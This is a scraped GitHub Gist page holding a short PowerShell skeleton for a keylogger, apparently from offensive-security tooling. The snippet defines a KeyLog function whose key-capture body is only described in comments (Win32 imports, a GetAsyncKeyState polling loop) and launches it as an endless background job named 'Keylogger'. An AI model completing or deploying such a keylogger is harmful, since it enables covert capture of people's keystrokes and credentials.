Last active
January 19, 2016 16:22
-
-
Save secabstraction/601155af5a0080ff77de to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Initilizer = { | |
function KeyLog { | |
# Win32 Imports | |
Start-Sleep -Milliseconds $PollingInterval | |
# Excessive GetAsyncKeyState loop to check for pressed keys | |
} | |
} | |
Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment